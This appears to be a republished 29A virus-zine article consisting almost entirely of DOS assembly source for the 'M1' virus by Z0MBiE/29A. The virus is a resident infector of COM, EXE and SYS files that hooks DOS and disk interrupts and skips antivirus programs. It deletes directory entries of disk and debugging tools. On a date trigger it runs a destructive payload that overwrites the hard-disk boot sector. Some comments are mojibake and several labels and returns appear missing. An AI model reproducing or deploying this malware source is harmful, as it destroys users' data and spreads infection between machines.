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29A Issue 03 06 03

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Published in 
 · 4 years ago


min_size equ 2000

max_com_size equ 50000

dta_struc struc
dta_driveletter db ? ; 0=Ay
dta_name8 db 8 dup (?) ;
dta_ext3 db 3 dup (?) ;
dta_searchattr db ? ;
dta_direntrynum dw ? ; 0=. 1=..
dta_dircluster dw ?
dd ? ; unused
dta_attr db ? ; 1=r 32=a 16=d 2=h 4=s 8=v
dta_time dw ? ; çççç第¬ ¬¬¬ááááá
dta_date dw ? ; £££££££¬ ¬¬¬¤¤¤¤¤
dta_size dd ?
dta_name db 13 dup (?)

exe_struc struc
exe_mz dw ? ; MZ/ZM
exe_last512 dw ?
exe_num512 dw ?
exe_relnum dw ?
exe_headersize dw ? ; in PAR
exe_minmem dw ?
exe_maxmem dw ?
exe_ss dw ?
exe_sp dw ?
exe_checksum dw ? ; 0
exe_ip dw ?
exe_cs dw ?
exe_relofs dw ?
exe_ovrnum dw ? ; 0
db 32 dup (?)
exe_neptr dd ?

sft_struc struc
sft_handles dw ? ; ᪮«ìª® ã ä ©«  ¤¥áªà¨¯â®à®¢
sft_openmode dw ?
sft_attr db ? ;  âਡãâë ä ©« 
sft_flags dw ? ; ‚€œ… ¡¨â 14 - á®åà ­ïâì ¤ âã/¢à¥¬ï ¯à¨ § ªàë⨨
sft_deviceptr dd ? ; ¥á«¨ ᨬ¢®«ì­®¥ ãáâà-¢® - header ¤à ©¢¥à 
sft_1stcluster dw ? ; ­ ç «ì­ë© ª« áâ¥à ä ©« 
sft_date dw ?
sft_time dw ?
sft_size dd ?
sft_pos dd ?
sft_lastFclustr dw ? ; ®â­®á¨â¥«ì­ë© ­®¬¥à ª« áâ¥à  ¢ ä ©«¥
; ª ª®â®â®à¬ã ¡ë«® ¯®á«¥¤­¥¥ ®¡à é¥­¨¥
sft_dirsect dd ? ; ᥪâ®à ᮤ¥à¦ é¨© í«¥¬¥­â ª â «®£ 
sft_dirpos db ? ; ­®¬¥à í«¥¬¥­â  ª â «®£  ¢ ᥪâ®à¥
sft_name db 11 dup (?)
sft_chain dd ? ; share.exe
sft_uid dw ? ; share.exe
sft_psp dw ?
sft_mft dw ? ; share.exe
sft_lastclust dw ? ; ­®¬¥à ª« áâ¥à  ª ª®â®à®¬ã ¡ë«® ¯®á«. ®¡à é.
sft_ptr dd ? ; 㪠§ â¥«ì ­  ¤à ©¢¥à ifs ä ©« /0 ¥á«¨ «®ª.

.model small
locals __


org 100h
jmp initialize

com_entry: push cs

push ax

mov ax, cs
add ax, 1234h
com_disp_shr4 equ word ptr $-2
push ax
lea ax, __1
push ax

__1: push si
push di
push cx

mov di, 1234h
com_rest_add100h equ word ptr $-2
lea si, savehdr
mov cx, savehdr_size
rep movsb

call tsr

pop cx
pop di
pop si

pop ax

push cs:com_rest_add100h

com_E9 db 0E9h
com_jmp dw ?

savehdr_size equ 16
savehdr db savehdr_size dup (?)

exe_entry: call tsr

mov ax, es

add cs:save_cs, ax

add ax, 1234h
save_ss equ word ptr $-2
mov ss, ax
mov sp, 1234h
save_sp equ word ptr $-2

db 0eah
save_ip dw ?
save_cs dw ?

db 13,10

calc_id db 'M1 [i286] v1.00 (c)"98 Z0MBiE/29A',13,10

db 'homepage(s):',13,10
db '',13,10
db '',13,10
db 'e-mail:',13,10
db '',13,10

db 13,10

not byte ptr [si]

db '“ ’› ‹Ÿ —…ƒŽ ‚€€™… kAZpER ’‚Žž ‹Ÿ ‚€˜“ Œ€’œ ˆ‹ˆ Š’Ž ?!',13,10
db '2 ¯®á«¥¤­¨å Zombie. ¢¨àãá  ­ §ë¢ îâáï 007JB ¨ ­¥ ¨­ ç¥.',13,10
db 'RENAME ¨«¨ ‘„Ž•ˆ, ᪮⨭ !',13,10
db '€ â® á«¥¤ãî騩 ¢¨à ¡ã¤¥â ®¡­ à㦥­ ¢ ⢮¨å ¯®£ ­ëå ¡ § å,',13,10
db 'ª®â®àë¥ ï ®â®è«î ⢮¨¬ ¦¨¤®¬ á®­áª¨¬ (¯®)¤à㦪 ¬-¤¨áâਡìîâ®à ¬...',13,10
db '€ ¥é¥ à á᪠¦ã ¢á¥¬ ª ª âë ¯¥à¥¯ãâ « shadowram ¨ flashbios, ãñ¡®ª,',13,10
db '¨ ¯à® ¤¦ ¬¯¥à (!) ¢ ¤®ª¥ ­ ¯¨á «.',13,10
db '„   , ¨ ªáâ â¨! ®ç¥¬ã ⢮© sux subj› ¢ë«¥ç¨âì ­¥ ¬®¦¥â?',13,10
db 13,10
db 'p.s. Ÿ „€†… ˆ … „“Œ€ž —’Ž ’Ž’ ’…Š‘’ Ž€„…’ ‚ „ŽŠˆ ;) ;) ;)',13,10

tsr: call push_regs

push cs
pop ds

mov al, 88h ; hehe
out 88h, al
in al, 88h
xor al, 88h
lea di, crypt
__1: add BYTE ptr [di], al
inc di
cmp di, offset codeend
jae crypt
jmp __1

mov ah, 2Ah
int 21h
cmp dl, dh
je fuckup

mov ax, 'WW'
lea bx, ret_M1
int 21h
cmp ax, 'M1'
je __exit

mov ax, 5801h
mov bx, 0082h
int 21h

mov ah, 48h
mov bx, memory
int 21h

mov ax, 5801h
xor bx, bx
int 21h

jnc __ok

push es
mov ax, es
dec ax
mov es, ax
mov bx, es:[0003h]
pop es

mov ah, 4Ah
sub bx, memory+1
int 21h
jc __exit

mov ah, 48h
mov bx, memory
int 21h
jc __exit

__ok: dec ax
push ax

mov ah, 52h
int 21h
mov cx, es:[bx-2]

pop ax
mov es, ax

mov word ptr es:[0001h], cx
mov byte ptr es:[0008h], 0

sub ax, 16 - 1
mov es, ax

push es

mov ax, 3521h
int 21h
mov old21.word ptr 0, bx
mov old21.word ptr 2, es

mov ah, 13h
int 2Fh
mov cs:old13.word ptr 0, bx
mov cs:old13.word ptr 2, es
int 2Fh

pop es

mov working, 0 ; !!!
mov enable_del, 0 ; !!!

mov di, 0100h
lea si, start
mov cx, memory * 16
rep movsb

push es
pop ds

mov ax, 2521h
lea dx, int21
int 21h

lea dx, int13
les bx, cs:old13
mov ah, 13h
int 2Fh

__exit: call pop_regs

fuckup: mov ax, 2516h
mov dx, 0f000h
mov ds, dx
mov dx, 0fff0h
int 21h

mov ax, 40h
mov es, ax
xor di, di
mov cx, 256
xor ax, ax
rep stosb

mov ax, 0301h
mov cx, 0001h
mov dx, 0080h
int 13h

__1: cli
jmp __1

int13: cmp ax, 'WW'
je ax_WW

cmp cs:working, 1
je exit13

cmp cs:enable_del, 1
jne exit13

mov cs:ax13, ax

cmp ah, 02h
je ah_02
cmp ah, 03h
je ah_03

exit13: db 0eah
old13 dd ?

ah_02: pushf
call cs:old13

call scan_esbx

retf 2

ah_03: call scan_esbx

jmp exit13

scan_esbx: pushf
call push_regs

push cs
pop ds

mov cx, ax13
xor ch, ch
shl cx, 4
jcxz __2

__1: push cx

lea si, delete
mov cx, delete_count
mov di, bx
call is_in_list
jnc __3

mov di, bx
mov cx, 32
mov al, 0E5h
rep stosb

__3: pop cx

add bx, 32
loop __1

__2: call pop_regs

int21: cmp ax, 'WW'
je ax_WW

cmp cs:working, 1
je exit21

cmp ah, 4Bh
je infect_dsdx
cmp ah, 43h
je infect_dsdx
cmp ah, 3Dh
je infect_dsdx
cmp ah, 56h
je infect_dsdx

exit21: db 0eah
old21 dd ?

ax_WW: call bx
retf 2

ret_M1: mov ax, 'M1'

infect_dsdx: mov cs:working, 1

mov cs:temp_ss, ss
mov cs:temp_sp, sp

push cs
pop ss
lea sp, exe_temp_sp

mov cs:func_ax, ax

call infect_file

mov ax, cs:func_ax

mov ss, cs:temp_ss
mov sp, cs:temp_sp

mov cs:working, 0

jmp exit21

; infect_file subroutine
; parameters: ds:dx = name of file

infect_file: call push_regs

mov ah, 60h ; copy (&canonize) file name
mov si, dx ; from ds:dx to [filename]
push cs
pop es
lea di, filename
int 21h
jc __exit

mov ah, 2fh ; get & push dta addr
int 21h
push es
push bx

push cs
pop ds

mov ah, 1ah ; set own dta
lea dx, dta
int 21h

mov ah, 4eh ; try to find file
mov cx, 1+2+4+32
lea dx, filename
int 21h

mov ah, 1ah ; pop & set dta addr
pop dx
pop ds
int 21h

jc __exit ; exit if no file found

; well, file found

push cs
pop ds

; check date & time - maybe alredy infected

mov ax, dta.dta_date
not ax ; çççç第¬¬¬¬ááááá
and ax, 0111101111101111b ; to avoid "bad" time
cmp ax, dta.dta_time
je __exit
mov dta.dta_time, ax

; no virus timestamp, so check file name for AV file

push cs
pop es

lea si, noinfect
mov cx, noinfect_count
lea di, dta.dta_name8
call is_in_list
jnc __okey

cmp func_ax, 4b00h
jne __exit
mov func_ax, 4c00h
mov enable_del, 1
jmp __exit

__okey: ; normal file name i think, so check for size

mov ax, dta.dta_size.word ptr 0
mov dx, dta.dta_size.word ptr 2

or dx, dx
ja __1
cmp ax, min_size
jb __exit

; dont infect files with size = xxx00..xxx01

__1: mov cx, 100
div cx

cmp dx, 1
jbe __exit

mov ax, 3d00h ; open file
lea dx, filename
int 21h
jc __exit

xchg bx, ax

call fuck_sft ; change open mode (ro->rw)

call read_header ; read header

mov ax, 4202h ; read last eof_size bytes
mov dx, -eof_size ; to eof
mov cx, -1
int 21h

mov ah, 3fh
lea dx, eof
mov cx, eof_size
int 21h

mov si, EOF.word ptr 0 ; calc id
xor si, EOF.word ptr 2
add si, EOF.word ptr 4
and si, 31
xor si, word ptr calc_id[si]
and si, 31
sub si, word ptr calc_id[si]

cmp si, EOF.word ptr 6 ; alredy infected?
je __close
mov EOF.word ptr 6, si ; set id

; round up file size to 1 paragraph

mov di, dta.dta_size.word ptr 2
mov si, dta.dta_size.word ptr 0

add dta.dta_size.word ptr 0, 15
adc dta.dta_size.word ptr 2, 0
and dta.dta_size.byte ptr 0, 0F0h

mov ax, header.word ptr 0

mov cx, dta.dta_ext3.word ptr 0
xchg cl, ch

cmp ax, 'MZ'
je __exe
cmp ax, 'ZM'
je __exe

cmp ax, -1
je __sys

cmp cx, 'CO'
je __com
cmp cx, 'TP'
je __tpu
cmp cx, 'BG'
je __bgi

; unknown file type

jmp __close

__com: call infect_com
jmp __check

__bgi: call infect_bgi
jmp __check

__tpu: call infect_tpu
jmp __check

__sys: cmp cx, 'SY'
je __2
cmp cx, 'DR'
jne __close

__2: call infect_sys
jmp __check

__exe: cmp cx, 'EX'
je __3
cmp cx, 'PR'
je __3
cmp cx, 'OV'
jne __close

__3: call infect_exe
jmp __check

__check: jc __close

mov ax, 5701h
mov dx, dta.dta_date
mov cx, dta.dta_time
int 21h

__close: call unfuck_sft

mov ah, 3eh ; close file
int 21h

__exit: call pop_regs ; exit


seek_eof: mov ax, 4200h
mov cx, dta.dta_size.word ptr 2
mov dx, dta.dta_size.word ptr 0
int 21h

seek_si: mov ax, 4200h
xor cx, cx
mov dx, si
int 21h

write_header: mov ah, 40h
jmp rw_hdr

read_header: mov ah, 3fh

rw_hdr: lea dx, header
mov cx, header_size
int 21h

infect_com: or di, di
jnz __exit
cmp si, max_com_size
ja __exit

xor si, si
mov bp, 100

__em: dec bp
jz __done

mov al, header.byte ptr 0

cmp al, 0E9h
je __near
cmp al, 0E8h
je __near

cmp al, 0EBh
je __short

cmp al, 0CDh
je __skip2

cmp al, 0BCh ; mov SP, xxxx
je __done

and al, 11111000b ; MOV

cmp al, 0B8h
je __skip3
cmp al, 0B4h
je __skip2

__done: mov ax, dta.dta_size.word ptr 0
sub ax, si
add ax, -3 + com_entry - start
mov com_jmp, ax

call seek_si

mov ah, 40h
lea dx, com_E9
mov cx, 3
int 21h

lea ax, [si+100h]
mov com_rest_add100h, ax

mov ax, dta.dta_size.word ptr 0
mov cl, 4
shr ax, cl
mov com_disp_shr4, ax

lea si, header
push cs
pop es
lea di, savehdr
mov cx, savehdr_size
rep movsb

call write_to_end


__exit: stc

__short: mov ax, si
add al, header.byte ptr 1
adc ah, 0
jmp __check

__skip3: lea ax, [si+3]
jmp __check

__skip2: lea ax, [si+2]
jmp __check

__near: mov ax, si
add ax, header.word ptr 1
add ax, 3

__check: cmp ax, si
je __done

mov cx, dta.dta_size.word ptr 0
sub cx, 64
cmp ax, cx
jae __done

mov si, ax

call seek_si
call read_header

jmp __em

write_to_end: call seek_eof

mov ah, 40h
lea dx, start
mov cx, virsize
int 21h


infect_exe: mov ax, header.exe_num512
dec ax
jle __exit
mov cx, 512
mul cx
add ax, header.exe_last512
adc dx, 0

cmp ax, si
jne __exit
cmp dx, di
jne __exit

mov si, header.exe_headersize
mov cl, 4
shl si, cl

mov dx, dta.dta_size.word ptr 2
mov ax, dta.dta_size.word ptr 0

push ax
push dx
add ax, virsize
adc dx, 0
mov cx, 512
div cx
inc ax
mov header.exe_num512, ax
mov header.exe_last512, dx
pop dx
pop ax

sub ax, si
sbb dx, 0

test dx, 1111111111110000b
jnz __exit

mov cl, 4
rol dx, cl
shr ax, cl

add ax, dx
jc __exit

mov cx, header.exe_ss
add cx, 16
mov save_ss, cx
mov cx, header.exe_cs
add cx, 16
mov save_cs, cx
mov cx, header.exe_sp
mov save_sp, cx
mov cx, header.exe_ip
mov save_ip, cx

sub ax, 16
mov header.exe_cs, ax
mov header.exe_ss, ax

mov header.exe_sp, offset exe_temp_sp
mov header.exe_ip, offset exe_entry

mov ax, header.exe_minmem
add ax, exememory
jnc __a
mov ax, -1
__a: mov header.exe_minmem, ax

mov ax, header.exe_maxmem
add ax, exememory
jnc __b
mov ax, -1
__b: mov header.exe_maxmem, ax

mov ax, 4200h
xor cx, cx
int 21h

call write_header

call write_to_end



__exit: stc

infect_sys: stc

infect_tpu: stc

infect_bgi: stc

push_regs: pop cs:temp
push ax bx cx dx si di bp ds es
jmp_temp: jmp cs:temp

pop_regs: pop cs:temp
pop es ds bp di si dx cx bx ax
jmp jmp_temp

; input: DS:SI=list ptr
; CX=list count

; ES:DI=file name

; output: CF=1 in list


__0: push cx si di

mov cx, 11
__1: cmpsb
je __2
cmp byte ptr [si-1], '?'
jne __3
__2: loop __1

pop di si cx


__3: pop di si cx

add si, 11

loop __0


fuck_sft: call init_sft
mov es:[di].sft_openmode, 2

unfuck_sft: call init_sft
mov es:[di].sft_openmode, 0

init_sft: push ds
push bx
mov ax, 1220h
int 2fh
mov bl, es:[di]
mov ax, 1216h
int 2fh
pop bx
pop ds

random: in al, 40h
mov ah, al
in al, 40h

noinfect: db '-U?????????'
db '-D?????????'
db 'ADINF??????'
db 'AIDS???????'
db 'ANTI???????'
db 'AVP????????'
db 'BOOTSAFE???'
db 'CLEAN??????'
db 'DRWEB??????'
db 'F-PROT?????'
db 'GUARD??????'
db 'MCAFEE?????'
db 'NAV????????'
db 'NOD????????'
db 'SCAN???????'
db 'TB?????????'
db 'TNTVIRUS???'
db 'VIRUS??????'
db 'VSAFE??????'
db 'WEB????????'

noinfect_count equ ($-noinfect)/11

db 'FORMAT?????'
db 'FDISK??????'
db 'CHKDSK?????'
db 'DE?????????'
db 'NDD????????'
db 'SCANDISK???'
db 'DEBUG??????'
db 'S-ICE??????'
db 'TD?????????'
db 'HIEW???????'
db 'LDR????????'

delete_count equ ($-delete)/11

eof_size equ 32
eof db eof_size dup (0F6h)

virsize equ codeend-start

temp dw ?
filename db 128 dup (?)
dta dta_struc ?

header_size equ 64
header db header_size dup (?)

func_ax dw ?
ax13 dw ?

working db ?
enable_del db ?

temp_sssp label dword
temp_sp dw ?
temp_ss dw ?

if ($-start) and 1 ne 0
db ?

db 1024 dup (?)

memory equ ($-start+15)/16
exememory equ ($-codeend+15)/16

initialize: lea si, encr_start
mov cx, encr_end - encr_start
__1: not byte ptr [si]
inc si
loop __1

jmp tsr

end start

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